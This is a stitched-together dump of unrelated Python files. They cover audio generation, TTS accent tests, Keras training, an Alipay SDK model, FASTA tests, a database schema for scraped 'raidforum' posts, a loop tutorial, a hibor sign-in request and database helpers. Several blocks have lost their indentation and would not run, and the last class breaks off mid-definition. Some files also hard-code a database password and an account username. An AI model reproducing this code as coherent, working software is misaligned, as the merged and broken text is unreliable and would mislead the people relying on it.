class OfferItem(scrapy.Item):
    """A single scraped job offer: its tech stack, location and salary."""
    # scrapy.Field() declares a free-form item attribute; no type is enforced here.
    technologies = scrapy.Field()
    city = scrapy.Field()
    salary = scrapy.Field()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Audio sinusoidal waves generator.
---------------------------------
Can be used to generate waves of the particular frequency,
or sum of all frequencies for frequency response measurements.
"""
import argparse
import numpy
import sounddevice
SAMPLING = 44100  # Hz

def generate_signal(frequency, cycles):
    """ Generates samples of the sine wave at specified frequency
    over the length of given number of cycles. Amplitude is
    scaled down to avoid getting over the <-1; 1> range.

    :param frequency: wave frequency in Hz
    :param cycles: number of wave periods to emit
    :return: 1-D numpy array of samples in [-0.9; 0.9]
    """
    T = 1 / frequency
    # BUGFIX: numpy.linspace requires an integer sample count -- passing the float
    # T * SAMPLING raises a TypeError on modern numpy versions.
    X = numpy.linspace(0, T, int(T * SAMPLING))
    Y = 0.9 * numpy.sin(2 * numpy.pi * frequency * X)
    return numpy.tile(Y, cycles)
def generate_spectral_signal(frequencies, cycles):
    """ Generate normalized sum of all given frequencies.

    The component waves are truncated to the shortest one, summed, and the
    result is scaled so the loudest sample has magnitude 1.

    :param frequencies: iterable of frequencies in Hz
    :param cycles: number of wave periods per component
    :return: 1-D numpy array of samples in [-1; 1]
    """
    F = [generate_signal(f, cycles) for f in frequencies]
    minLen = min(len(f) for f in F)
    X = sum(f[:minLen] for f in F)
    # BUGFIX: normalize by the peak *magnitude* -- dividing by the (possibly smaller)
    # signed maximum could push negative samples below -1.
    return X / numpy.max(numpy.abs(X))
def compute_spectrum(X, cutoff=numpy.inf):
    """ Compute normalized frequency spectrum.

    Returns the one-sided (frequency, magnitude) arrays, dropping the DC bin
    and everything above the last frequency below the cutoff.
    """
    half = int(len(X) / 2)
    magnitudes = numpy.abs(numpy.fft.fft(X))[:half] / len(X)
    frequencies = numpy.fft.fftfreq(len(X), 1.0 / SAMPLING)[:half]
    # Index of the last frequency bin that is still below the cutoff.
    last_below_cutoff = numpy.where(frequencies < cutoff)[0][-1]
    return frequencies[1:last_below_cutoff], magnitudes[1:last_below_cutoff]
def configure():
    """ Configure sounddevice to use default audio
    output device at the given sampling rate.
    """
    sounddevice.default.samplerate = SAMPLING
    # NOTE(review): hard-codes device index 1 from the enumeration -- this is
    # machine-dependent; confirm it matches the intended output device.
    sounddevice.default.device = sounddevice.query_devices()[1]["name"]
def play(frequency, length):
    """ Generate signal and play it. This function
    blocks until the entire signal is played.
    Can be stopped by <Ctrl + C> signal.

    :param frequency: wave frequency in Hz
    :param length: number of wave periods to play
    """
    signal = generate_signal(frequency, length)
    sounddevice.play(signal)
    # Block until playback finishes.
    sounddevice.wait()
def play_frequency_spectrum(low, high, cycles):
    """ Play signal composed of all frequencies in range <low; high).

    :param low: lowest frequency in Hz (inclusive)
    :param high: highest frequency in Hz (exclusive)
    :param cycles: number of wave periods per component frequency
    """
    signal = generate_spectral_signal(range(low, high), cycles)
    print("playing signal...")
    sounddevice.play(signal)
    # Block until playback finishes.
    sounddevice.wait()
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # BUGFIX: --frequency is always used below -- omitting it crashed play() with a
    # None frequency; argparse now reports a clear usage error instead.
    parser.add_argument("--frequency", type=int, required=True, help="Wave frequency")
    parser.add_argument(
        "--cycles",
        type=int,
        default=1,
        help="Length of the signal in multiples of the wave period.",
    )
    args = parser.parse_args()
    configure()
    play(args.frequency, args.cycles)
|
import pyopenjtalk
from ttslearn.tacotron.frontend.openjtalk import pp_symbols
def test_pp_symbols_kurihara():
    # Examples taken from the reference paper
    # Ref: Prosodic Features Control by Symbols as Input of Sequence-to-Sequence
    # Acoustic Modeling for Neural TTS
    for text, expected in [
        # NOTE: in the reference, "お伝えします" forms a single accent phrase, but
        # pyopenjtalk splits it into the two accent phrases "お伝え" and "します"
        ("続いて、ニュースをお伝えします", "^tsu[zuite_nyu]usuo#o[tsutae#shi[ma]su$"),
        # NOTE: the PP notation in Table 4 of the reference appears to place the
        # accent nucleus of "横ですか" at the wrong position
        # wrong: "ヨ^コデス!カ"
        # right: "ヨ^コデ!スカ"
        ("私の席は、あの婦人の横ですか。", "^wa[tashino#se]kiwa_a[no#fu[jiNno#yo[kode]suka$"),
    ]:
        actual = "".join(pp_symbols(pyopenjtalk.extract_fullcontext(text)))
        assert actual == expected
def test_pp_symbols_python_book():
    # Examples used in the book "Speech Synthesis Learned with Python"
    for text, expected in [
        # Chapter 10
        ("一貫学習にチャレンジしましょう!", "^i[clkaNga]kushuuni#cha[re]Nji#shi[masho]o$"),
        ("端が", "^ha[shiga$"),
        ("箸が", "^ha]shiga$"),
        ("橋が", "^ha[shi]ga$"),
        ("今日の天気は?", "^kyo]ono#te]Nkiwa?"),
        # Chapter 4
        ("日本語音声合成のデモです。", "^ni[hoNgooNseego]oseeno#de]modesu$"),
        # Chapter 6
        (
            "深層学習に基づく音声合成システムです。",
            "^shi[Nsooga]kushuuni#mo[tozu]ku#o[Nseegooseeshi]sutemudesu$",
        ),
        # Chapter 8
        ("ウェーブネットにチャレンジしましょう!", "^we]ebunecltoni#cha[re]Nji#shi[masho]o$"),
    ]:
        actual = "".join(pp_symbols(pyopenjtalk.extract_fullcontext(text)))
        assert actual == expected
def test_pp_symbols_accent_phrase():
    # Regression cases for accent-phrase boundary handling,
    # https://github.com/r9y9/ttslearn/issues/26
    for text, expected in [
        ("こんにちは", "^ko[Nnichiwa$"),
        ("こ、こんにちは", "^ko_ko[Nnichiwa$"),
        ("ここ、こんにちは", "^ko[ko_ko[Nnichiwa$"),
        ("くっ、こんにちは", "^ku]cl_ko[Nnichiwa$"),
        ("きょ、こんにちは", "^kyo_ko[Nnichiwa$"),
        ("ん、こんにちは", "^N_ko[Nnichiwa$"),
        ("んっ、こんにちは", "^N]cl_ko[Nnichiwa$"),
    ]:
        actual = "".join(pp_symbols(pyopenjtalk.extract_fullcontext(text)))
        assert actual == expected
|
# USAGE
import keras
from keras.models import load_model
from keras.models import Model
from keras.layers import Dense
from keras.utils.vis_utils import plot_model
from keras.utils.generic_utils import CustomObjectScope
from keras.callbacks import ModelCheckpoint, EarlyStopping
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam, Nadam
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from common_models.MobileNetV2_beta import MobileNetV2
from imutils import paths
import numpy as np
import pandas as pd
import argparse
import random
import pickle
import cv2
import os
from PIL import ImageFile
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Command-line options for data, weight, and output locations.
# (Fixed typos in the user-facing help strings.)
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--data_path",
                default='dataset',
                help='the directory of the dataset')
ap.add_argument("-w", "--weight_path",
                default='model_outputs/mobilenet_v2_weights_tf_dim_ordering_tf_kernels_1.0_224.h5',
                help='the path of the pre-trained weights')
ap.add_argument("-l", "--labelbin",
                default='model_outputs/lb.pickle',
                help="path to output label binarizer")
ap.add_argument("-s", "--save_model",
                default='model_outputs/best.weights.pokmobilenetv2.h5',
                help='the path where the best model weights are saved')
ap.add_argument("--load_model",
                default='trained_models/best.weights.pokmobilenetv2.h5',
                help='the path of the trained model')
args = vars(ap.parse_args())
# init hyperparameters and training switches
EPOCHS = 200              # maximum number of training epochs
INIT_LR = 1e-4            # initial learning rate for Adam
BS = 128                  # batch size
IMAGE_DIMS = (96, 96, 3)  # input image (height, width, channels)
freeze_until = None       # layer name to freeze up to (None = train everything)
train_from = 'trained_model'  # 'trained_weights' | 'trained_model' | anything else = fresh model
def load_datas_and_label_binarize():
    """Load images from args["data_path"], binarize labels, and split train/test.

    The label for each image is its parent directory name. The fitted
    LabelBinarizer is serialized to args["labelbin"].

    Returns:
        (trainX, testX, trainY, testY, lb) — 80/20 split plus the binarizer.
    """
    data = []
    labels = []
    print("[INFO] loading images...")
    imagePaths = sorted(list(paths.list_images(args["data_path"])))
    # Deterministic shuffle so runs are reproducible.
    random.seed(42)
    random.shuffle(imagePaths)
    for imagePath in imagePaths:
        # load the image, pre-process it, and store it in the data list
        image = cv2.imread(imagePath)
        image = cv2.resize(image, (IMAGE_DIMS[1], IMAGE_DIMS[0]))
        image = img_to_array(image)
        data.append(image)
        # Label is the immediate parent directory of the image file.
        label = imagePath.split(os.path.sep)[-2]
        labels.append(label)
    # Scale pixel intensities to [0, 1].
    data = np.array(data, dtype="float") / 255.0
    labels = np.array(labels)
    print("[INFO] data matrix: {:.2f}MB".format(data.nbytes / (1024 * 1000.0)))
    lb = LabelBinarizer()
    labels = lb.fit_transform(labels)
    trainX, testX, trainY, testY = train_test_split(data, labels, test_size=0.2, random_state=42)
    print("[INFO] serializing label binarizer...")
    # FIX: use a context manager so the file is closed even if pickling fails
    # (the original open/write/close left the handle open on error).
    with open(args["labelbin"], "wb") as f:
        f.write(pickle.dumps(lb))
    return trainX, testX, trainY, testY, lb
def load_models(imagedims, nb_classes):
    """Build a fresh MobileNetV2 classifier.

    Named load_models (plural) to avoid shadowing keras.models.load_model.
    """
    return MobileNetV2.build(imagedims, nb_classes)
def load_model_from_trained_weights(imagedims, nb_classes, weights=None, freeze_until=None):
    """Build MobileNetV2, load pre-trained weights, and attach a new softmax head.

    The network is truncated at the "dropout" layer, layers before
    `freeze_until` (a layer name) are frozen, and a fresh Dense softmax
    classifier for `nb_classes` outputs is appended.
    """
    model = MobileNetV2.build(imagedims, nb_classes)
    print("[INFO] loading weights...")
    model.load_weights(weights, by_name=False, skip_mismatch=False)
    # Drop everything after the dropout layer (the old classification head).
    model = Model(model.inputs, model.get_layer("dropout").output)
    if freeze_until:
        # Freeze all layers up to (but excluding) the named layer.
        for layer in model.layers[:model.layers.index(model.get_layer(freeze_until))]:
            layer.trainable = False
    # New classification head for this dataset's classes.
    out = Dense(units=nb_classes, activation='softmax')(model.output)
    model = Model(model.inputs, out)
    return model
def load_model_from_trained_model():
    """Load a fully trained model from args["load_model"].

    The CustomObjectScope supplies relu6/DepthwiseConv2D, which older
    Keras MobileNet models reference as custom objects during deserialization.
    """
    print("[INFO] loading network...")
    with CustomObjectScope({'relu6': keras.applications.mobilenet.relu6, 'DepthwiseConv2D':
                            keras.applications.mobilenet.DepthwiseConv2D}):
        model = load_model(args["load_model"])
    return model
def main():
    """Train the MobileNetV2 classifier and save the best weights plus plots.

    Pipeline: load data -> build/restore model (per `train_from`) -> compile ->
    train with augmentation and early stopping -> plot and dump the history.
    """
    print("[INFO] compiling model...")
    trainX, testX, trainY, testY, lb = load_datas_and_label_binarize()
    # On-the-fly data augmentation for the training set.
    aug = ImageDataGenerator(rotation_range=25, width_shift_range=0.1,
                             height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,
                             horizontal_flip=True, fill_mode="nearest")
    # Model source is selected by the module-level `train_from` switch.
    if train_from == 'trained_weights':
        model = load_model_from_trained_weights(imagedims=IMAGE_DIMS, nb_classes=len(lb.classes_),
                                                weights=args['weight_path'],
                                                freeze_until=freeze_until)
    elif train_from == 'trained_model':
        model = load_model_from_trained_model()
    else:
        model = load_models(imagedims=IMAGE_DIMS, nb_classes=len(lb.classes_))
    # Adam with linear LR decay over the full training run.
    opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
    #opt = Nadam
    model.compile(loss="categorical_crossentropy", optimizer=opt,
                  metrics=["accuracy"])
    plot_model(model, to_file='model_outputs/architecture.png',
               show_layer_names=True, show_shapes=True)
    # train the network
    print("[INFO] training network...")
    # Keep only the best checkpoint (lowest validation loss).
    checkpoint = ModelCheckpoint(filepath=args['save_model'], monitor='val_loss', verbose=0,
                                 save_best_only=True, save_weights_only=False,
                                 mode='auto', period=1)
    stopearly = EarlyStopping(monitor='val_loss', min_delta=.0, patience=30, verbose=0, mode='auto')
    callbacks = [checkpoint, stopearly]
    H = model.fit_generator(
        aug.flow(trainX, trainY, batch_size=BS),
        validation_data=(testX, testY),
        steps_per_epoch=len(trainX) // BS,
        callbacks=callbacks,
        epochs=EPOCHS, verbose=1)
    # Plot loss/accuracy curves for train and validation.
    # NOTE(review): these keys assume Keras 2.x naming ("acc"/"val_acc");
    # newer Keras records "accuracy"/"val_accuracy" — confirm against the
    # installed Keras version.
    plt.style.use("ggplot")
    plt.figure()
    plt.plot(H.history["loss"], label="train_loss")
    plt.plot(H.history["val_loss"], label="val_loss")
    plt.plot(H.history["acc"], label="train_acc")
    plt.plot(H.history["val_acc"], label="val_acc")
    plt.title("Training Loss and Accuracy")
    plt.xlabel("Epoch #")
    plt.ylabel("Loss/Accuracy")
    plt.legend(loc="upper left")
    plt.savefig('model_outputs/acc_loss.png')
    # Persist the raw training history alongside the plot.
    df = pd.DataFrame.from_dict(H.history)
    df.to_csv('model_outputs/hist.csv', encoding='utf-8', index=False)
if __name__ == '__main__':
    main()
import jinja2
import os
import string
# Jinja2 environment rooted at the package-local "templates" directory.
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
jinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir))
class PlayerFormInput:
    """One player's control bindings and colour for the settings form."""

    # Key bindings and car colours offered by the form's drop-downs.
    keys = [*string.ascii_uppercase, *string.digits, 'LEFT', 'RIGHT', 'UP', 'DOWN']
    colors = ['RED', 'ORANGE', 'YELLOW', 'GREEN', 'BLUE', 'VIOLET']

    def __init__(self, number, left = "LEFT", right = "RIGHT", accelerate = "UP", reverse = "DOWN", color = "RED", use = True):
        self.number = number
        self.left = left
        self.right = right
        self.accelerate = accelerate
        self.reverse = reverse
        self.color = color
        self.use = use

    def render(self):
        """Render this player's HTML form snippet."""
        return render_str("player-form-input.html", player = self, keys = self.keys, colors = self.colors)

    def to_dic(self):
        """Return this player's settings as a plain dict (excludes `use`)."""
        return {
            "number": self.number,
            "left": self.left,
            "right": self.right,
            "accelerate": self.accelerate,
            "reverse": self.reverse,
            "color": self.color,
        }
def render_str(template, **params):
    """Render the named template from jinja_env with the given parameters."""
    return jinja_env.get_template(template).render(**params)
# Default player roster shown on the settings page.
player2 = PlayerFormInput("Two")
player1 = PlayerFormInput("One", "A", "D", "W", "S", color = 'GREEN')
player3 = PlayerFormInput("Three", "G", "J", "Y", "H", color = 'YELLOW', use = False)
player4 = PlayerFormInput("Four", "7", "9", "8", "0", color = 'BLUE', use = False)
players = [player1, player2, player3, player4]
renderedPage = render_str("game-settings-template.html", players = players)
# FIX: the original opened the file and never closed it; the context manager
# guarantees the rendered page is flushed and the handle released.
with open("web/game-settings.html", "w") as file:
    file.write(renderedPage)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MaterialCreateInfo import MaterialCreateInfo
class AntMerchantExpandFrontcategorySecurityCreateModel(object):
    """Generated Alipay OpenAPI request model (ant.merchant.expand.frontcategory.security.create).

    Plain data holder with property accessors plus dict (de)serialization
    helpers following the SDK's generated-code conventions.
    """
    def __init__(self):
        self._description = None
        self._material_list = None
        self._name = None
        self._scene = None
        self._target_id = None
        self._target_type = None
    @property
    def description(self):
        return self._description
    @description.setter
    def description(self, value):
        self._description = value
    @property
    def material_list(self):
        return self._material_list
    @material_list.setter
    def material_list(self, value):
        # Accepts a list of MaterialCreateInfo objects or raw dicts; dicts are
        # converted so the stored list is homogeneous. Non-list values are ignored.
        if isinstance(value, list):
            self._material_list = list()
            for i in value:
                if isinstance(i, MaterialCreateInfo):
                    self._material_list.append(i)
                else:
                    self._material_list.append(MaterialCreateInfo.from_alipay_dict(i))
    @property
    def name(self):
        return self._name
    @name.setter
    def name(self, value):
        self._name = value
    @property
    def scene(self):
        return self._scene
    @scene.setter
    def scene(self, value):
        self._scene = value
    @property
    def target_id(self):
        return self._target_id
    @target_id.setter
    def target_id(self, value):
        self._target_id = value
    @property
    def target_type(self):
        return self._target_type
    @target_type.setter
    def target_type(self, value):
        self._target_type = value
    def to_alipay_dict(self):
        """Serialize the model to a dict; fields that are falsy are omitted.

        NOTE: converting material_list entries rewrites them in place,
        mutating this instance's list as a side effect.
        """
        params = dict()
        if self.description:
            if hasattr(self.description, 'to_alipay_dict'):
                params['description'] = self.description.to_alipay_dict()
            else:
                params['description'] = self.description
        if self.material_list:
            if isinstance(self.material_list, list):
                for i in range(0, len(self.material_list)):
                    element = self.material_list[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.material_list[i] = element.to_alipay_dict()
            if hasattr(self.material_list, 'to_alipay_dict'):
                params['material_list'] = self.material_list.to_alipay_dict()
            else:
                params['material_list'] = self.material_list
        if self.name:
            if hasattr(self.name, 'to_alipay_dict'):
                params['name'] = self.name.to_alipay_dict()
            else:
                params['name'] = self.name
        if self.scene:
            if hasattr(self.scene, 'to_alipay_dict'):
                params['scene'] = self.scene.to_alipay_dict()
            else:
                params['scene'] = self.scene
        if self.target_id:
            if hasattr(self.target_id, 'to_alipay_dict'):
                params['target_id'] = self.target_id.to_alipay_dict()
            else:
                params['target_id'] = self.target_id
        if self.target_type:
            if hasattr(self.target_type, 'to_alipay_dict'):
                params['target_type'] = self.target_type.to_alipay_dict()
            else:
                params['target_type'] = self.target_type
        return params
    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a response dict; returns None for empty input."""
        if not d:
            return None
        o = AntMerchantExpandFrontcategorySecurityCreateModel()
        if 'description' in d:
            o.description = d['description']
        if 'material_list' in d:
            o.material_list = d['material_list']
        if 'name' in d:
            o.name = d['name']
        if 'scene' in d:
            o.scene = d['scene']
        if 'target_id' in d:
            o.target_id = d['target_id']
        if 'target_type' in d:
            o.target_type = d['target_type']
        return o
|
#!/usr/bin/env python
'''
unit tests for split_fasta.py
'''
from SmileTrain.test import fake_fh
import unittest
from SmileTrain import split_fasta
class TestSplitFastaEntries(unittest.TestCase):
    """Unit tests for split_fasta.split_fasta_entries.

    Entries are distributed across output handles either round-robin
    (default) or by sequence hash (by_hash=True).
    """
    def setUp(self):
        # Four fasta records to be split across the output handles.
        self.fh = fake_fh(">foo\nAAA\n>bar\nCCC\n>baz\nTTT\n>poo\nGGG\n")
    def test_correct(self):
        # Round-robin over three outputs: record 4 wraps back to output 0.
        outs = [fake_fh() for x in range(3)]
        split_fasta.split_fasta_entries(self.fh, outs)
        conts = [out.getvalue() for out in outs]
        self.assertEqual(conts, [">foo\nAAA\n>poo\nGGG\n", ">bar\nCCC\n", ">baz\nTTT\n"])
    def test_correct_by_hash(self):
        # Hash-based assignment over two outputs.
        outs = [fake_fh() for x in range(2)]
        split_fasta.split_fasta_entries(self.fh, outs, by_hash=True)
        conts = [out.getvalue() for out in outs]
        self.assertEqual(conts, [">foo\nAAA\n>bar\nCCC\n>poo\nGGG\n", ">baz\nTTT\n"])
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
|
import psycopg2
def database_creator():
    """Create the `posts` and `comments` tables in the raidforum database.

    Best-effort: any error is printed rather than raised. The connection is
    now always closed (the original leaked it when an exception fired after
    connect).
    """
    conn = None
    try:
        conn = psycopg2.connect(database="raidforum",user="saugat1",password="saugat123",host = "127.0.0.1",port = "5432")
        cur = conn.cursor()
        print(cur)
        table_schema1 = '''CREATE TABLE IF NOT EXISTS posts(
        post_id INT GENERATED ALWAYS AS IDENTITY,
        page_url VARCHAR(255) UNIQUE,
        page_title VARCHAR(255),
        text_content TEXT,
        date_time VARCHAR(255),
        username TEXT,
        user_title VARCHAR(255),
        PRIMARY KEY(post_id)
        )
        '''
        table_schema2 = '''
        CREATE TABLE IF NOT EXISTS comments(
        comment_id INT GENERATED ALWAYS AS IDENTITY,
        text_content TEXT,
        date_time VARCHAR(255),
        username TEXT,
        user_title VARCHAR(255),
        post_id INT,
        PRIMARY KEY(comment_id),
        CONSTRAINT fk_posts FOREIGN KEY(post_id) REFERENCES posts(post_id)
        )
        '''
        cur.execute(table_schema1)
        cur.execute(table_schema2)
        conn.commit()
        print("success")
    except Exception as e:
        print(e)
    finally:
        # FIX: close unconditionally so a failed execute/commit cannot leak
        # the connection.
        if conn is not None:
            conn.close()
def connection_creator():
    """Open a new connection to the raidforum database.

    Returns the psycopg2 connection, or None (implicitly) if connecting
    fails — the error is printed rather than raised.
    """
    try:
        conn = psycopg2.connect(database="raidforum",user="saugat1",password="saugat123",host = "127.0.0.1",port = "5432")
        return conn
    except Exception as e:
        print(e)
# database_creator() |
"""
For loops are called count controlled iteration
Unlike while loops that are controlled by a condition
for loops run a certain number of times and then stop.
The i variable after the key word for is the loop variable
Each time the loop executes the loop variable is incremented
The value of the loop variable starts at 0
You can only use the loop variable inside the loop (local variable)
The loop variable does not need to be called i. You can call it anything you like.
It is convention to call it i and if using a nested loop j
"""
print("\n\nFirst for loop\n")
# prints out "I love loops" 10 times
for i in range(10):
print("I love loops")
print("\n\nSecond for loop\n")
# prints out the value of the loop variable i on each loop
# notice that this starts at 0
for i in range(10):
print(i)
print("\n\nThird for loop\n")
# prints out the value of the loop variable i in the range 1 to 10
# The second element is the stop value and is value minus 1.
for i in range(1,11):
print(i)
print("\n\nfourth for loop\n")
# prints out the even values of the loop variable i in the range 2 to 10
# This uses the third element of the range function which is the step
# In this case step is set to 2
for i in range(2,11,2):
print(i)
print("\n\nfifth for loop\n")
# Asks the user for the number of the multiplication table to print
# Uses a for loop to print out that table
# Note the use of i the loop variable
multiplier = int(input("Enter the multiplication table you want to print: "))
for i in range(1,13):
print(i, "X", multiplier, "=", multiplier * i)
print("\n\nfifth for loop\n")
# using the keyword break terminates a loop immediately.
|
import requests
# Daily sign-in request against the hibor.com.cn mobile API, mimicking the
# iOS app's headers.
headers = {"User-Agent":"hui bo tou zi fen xi/2.5.5 (iPhone; iOS 14.4; Scale/2.00)",
           "Cookie":"safedog-flow-item=B51B3C6B0CC13D2D20E9766C4E571EB8",
           "Accept-Language":"zh-Hans-CN;q=1, en-CN;q=0.9, zh-Hant-CN;q=0.8, el-CN;q=0.7",
           "Content-Length":"52", "Accept-Encoding":"gzip, deflate", "Connection":"keep-alive"}
datas = {"action":"sign", "btype": "22", "systype": "iOS", "username": "iWhU5XlWiU"}
r = requests.post("http://mp.hibor.com.cn/MobilePhone/GetJsonHandler.ashx", data=datas, headers=headers)
# response body text
print(r.text)
# HTTP status code returned by the endpoint
print(r.status_code)
# parse the text
|
from django.contrib import admin
from .models import *
@admin.register(AdditionalInfo)
class AdditionalInfoAdmin(admin.ModelAdmin):
    """Django admin configuration for AdditionalInfo records."""
    search_fields = ['name']
    list_display = ('canonical', 'candidate', 'name', 'title',)
@admin.register(Candidate)
class CandidateAdmin(admin.ModelAdmin):
    """Django admin configuration for Candidate records."""
    search_fields = ['cand_name', 'cand_id']
    # NOTE: if re-enabled, this needs a trailing comma to be a tuple:
    # list_filter = ('office_govt',)
    list_display = ('cand_name', 'cand_id', 'committee_id')
@admin.register(Entity)
class EntityAdmin(admin.ModelAdmin):
    """Django admin configuration for Entity records."""
    search_fields = ['name', 'standard_name', 'nadcid', 'canonical']
    list_display = ('standard_name', 'nadcid', 'canonical', 'name',)
|
class ClickHouse:
    """Environment-driven settings and async connection helpers for ClickHouse."""
    @staticmethod
    def read_settings_async():
        """Read ClickHouse connection settings from the environment (.env file)."""
        from envparse import env
        env.read_envfile()
        config = dict()
        config["url"] = env("CH_URL")
        config["user"] = env("CH_USER")
        config["password"] = env("CH_PASS")
        return config
    @staticmethod
    async def init_async(config):
        """Open an aiochclient session and verify the server responds.

        Returns a dict with "client" and "session" — pass it to close_async.
        """
        from aiohttp import ClientSession
        from aiochclient import ChClient as Client
        session = ClientSession()
        client = Client(session, **config)
        # Fail fast if the server is unreachable.
        assert await client.is_alive()
        connect = {"client": client, "session": session}
        return connect
    @staticmethod
    async def close_async(connect):
        """Close the underlying HTTP session if it is still open."""
        if not connect["session"].closed:
            await connect["session"].close()
class MySQL:
    """Environment-driven settings plus sync/async connection helpers for MySQL."""

    @staticmethod
    def read_settings_async(connection_string=True):
        """Read MySQL settings from the environment (.env file).

        Returns {"connection_string": ...} when connection_string is truthy,
        otherwise the raw config dict (user/password only when set).
        """
        from envparse import env

        env.read_envfile()
        config = dict()
        mysql_user = env("MYSQL_USER", "")
        if mysql_user:
            config["user"] = mysql_user
        mysql_password = env("MYSQL_PASS", "")
        if mysql_password:
            config["password"] = mysql_password
        config["host"] = env("MYSQL_HOST")
        config["port"] = int(env("MYSQL_PORT"))
        config["db"] = env("MYSQL_DB")
        if connection_string:
            # Assemble mysql://[user][:password]@host:port/db
            url = "mysql://"
            if "user" in config:
                url += config["user"]
            if "password" in config:
                url += f":{config['password']}"
            url += f"@{config['host']}:{config['port']}/{config['db']}"
            return {"connection_string": url}
        return config

    @staticmethod
    async def init_async(config):
        """Connect an async `databases.Database` pool and return it."""
        from databases import Database

        database = Database(
            config["connection_string"], minsize=0, maxsize=10, pool_recycle=30
        )
        await database.connect()
        return database

    @staticmethod
    async def close_async(connect):
        """Disconnect the async pool if it is still connected."""
        if connect.is_connected:
            await connect.disconnect()

    @staticmethod
    def read_settings():
        """Sync settings are identical to the async ones."""
        return MySQL.read_settings_async()

    @staticmethod
    def init(config):
        """Open a blocking MySQLdb connection (autocommit on).

        Returns a dict with "connection" and "cursor" — pass it to close.
        """
        import MySQLdb

        config["autocommit"] = True
        connection = MySQLdb.connect(**config)
        return {"connection": connection, "cursor": connection.cursor()}

    @staticmethod
    def close(connect):
        """Close the cursor opened by init."""
        connect["cursor"].close()
class MongoDB:
    """Environment-driven settings plus sync/async connection helpers for MongoDB."""
    @staticmethod
    def read_settings_async():
        """Read the MongoDB connection string and database name from the environment."""
        from envparse import env
        env.read_envfile()
        config = dict()
        config["connection_string"] = env("MONGODB_CONNECTION_STRING")
        config["db"] = env("MONGODB_DB")
        return config
    @staticmethod
    async def init_async(config):
        """Open a motor client and return {"client": <database handle>}."""
        import motor.motor_asyncio as aiomotor
        conn = aiomotor.AsyncIOMotorClient(config["connection_string"])
        db = conn[config["db"]]
        connect = {"client": db}
        return connect
    @staticmethod
    async def close_async(connect):
        # The stored handle is a database; .client is its owning client.
        connect["client"].client.close()
    @staticmethod
    def read_settings():
        """Sync variant: the database name comes from the connection string itself."""
        from envparse import env
        env.read_envfile()
        config = dict()
        config["connection_string"] = env("MONGODB_CONNECTION_STRING")
        return config
    @staticmethod
    def init(config):
        """Open a blocking pymongo client and return {"client": <default database>}."""
        from pymongo import MongoClient
        conn = MongoClient(config["connection_string"])
        db = conn.get_database()
        connect = {"client": db}
        return connect
    @staticmethod
    def close(connect):
        # Intentionally a no-op: the MongoClient is left for GC to reclaim.
        pass
if __name__ == "__main__":
print(MySQL.read_settings_async())
|
'''
At CodeSignal, users can reach the top of the leaderboard by earning XP (experience points) in different modes. The leaderboard is sorted by players' XP in descending order, and in case of a tie, by their ids in ascending order.
Your task is to implement an algorithm that will return the state of the weekly leaderboard given a list of users.
Example
For
users = [["warrior", "1", "1050"],
["Ninja!", "21", "995"],
["recruit", "3", "995"]]
the output should be
sortCodesignalUsers(users) = ["warrior", "recruit", "Ninja!"].
'''
def sortCodesignalUsers(users):
    """Return usernames ordered by XP descending; ties broken by ascending id.

    Each user is a [username, id, xp] triple of strings.
    """
    ranked = sorted((CodeSignalUser(*fields) for fields in users), reverse=True)
    return [str(user) for user in ranked]


class CodeSignalUser(object):
    """Leaderboard entry; ordering is designed for sort(reverse=True)."""
    def __init__(self, *args):
        self.username = args[0]
        self.user_id = int(args[1])
        self.xp = int(args[2])

    def __lt__(self, other):
        # XP decides first; on a tie the id operands are swapped so that a
        # reverse sort yields ascending ids among equal-XP users.
        if self.xp != other.xp:
            return self.xp < other.xp
        return other.user_id < self.user_id

    def __str__(self):
        return self.username
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
import sys
import abc
import time
import struct
import serial
import threading
import collections as col
from types import SimpleNamespace
from datetime import datetime
from threading import Thread, Event
if sys.version_info.major == 2:
import subprocess32 as subprocess
from Queue import Queue, Empty
else:
import subprocess
from queue import Queue, Empty
class bcolors:
    """ANSI escape codes for coloured terminal output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    COLOR_NC = '\033[0m'  # No Color
    COLOR_WHITE = '\033[1;37m'
    COLOR_BLACK = '\033[0;30m'
    COLOR_BLUE = '\033[0;34m'
    COLOR_LIGHT_BLUE = '\033[1;34m'
    COLOR_GREEN = '\033[0;32m'
    COLOR_LIGHT_GREEN = '\033[1;32m'
    COLOR_CYAN = '\033[0;36m'
    COLOR_LIGHT_CYAN = '\033[1;36m'
    COLOR_RED = '\033[0;31m'
    COLOR_LIGHT_RED = '\033[1;31m'
    COLOR_PURPLE = '\033[0;35m'
    COLOR_LIGHT_PURPLE = '\033[1;35m'
    COLOR_BROWN = '\033[0;33m'
    COLOR_YELLOW = '\033[1;33m'
    # NOTE(review): COLOR_GRAY uses the same code as COLOR_BLACK ('0;30');
    # dark gray is conventionally '1;30' — confirm intent before changing.
    COLOR_GRAY = '\033[0;30m'
    COLOR_LIGHT_GRAY = '\033[0;37m'
# Pensel comms object
class PenselError(RuntimeError):
    """Raised for Pensel communication failures."""
    pass
class BasePensel(object, metaclass=abc.ABCMeta):
    """Abstract base for Pensel transports.

    Provides packet parsing and queue plumbing. Concrete subclasses must
    implement `send_report` and `close`, and are expected to run a listener
    thread (stored on `self.thread`) that fills `self.queue` with
    (report, retval, payload) tuples.
    """
    def __init__(self, *args, verbose=False, **kwargs):
        self.verbose = verbose
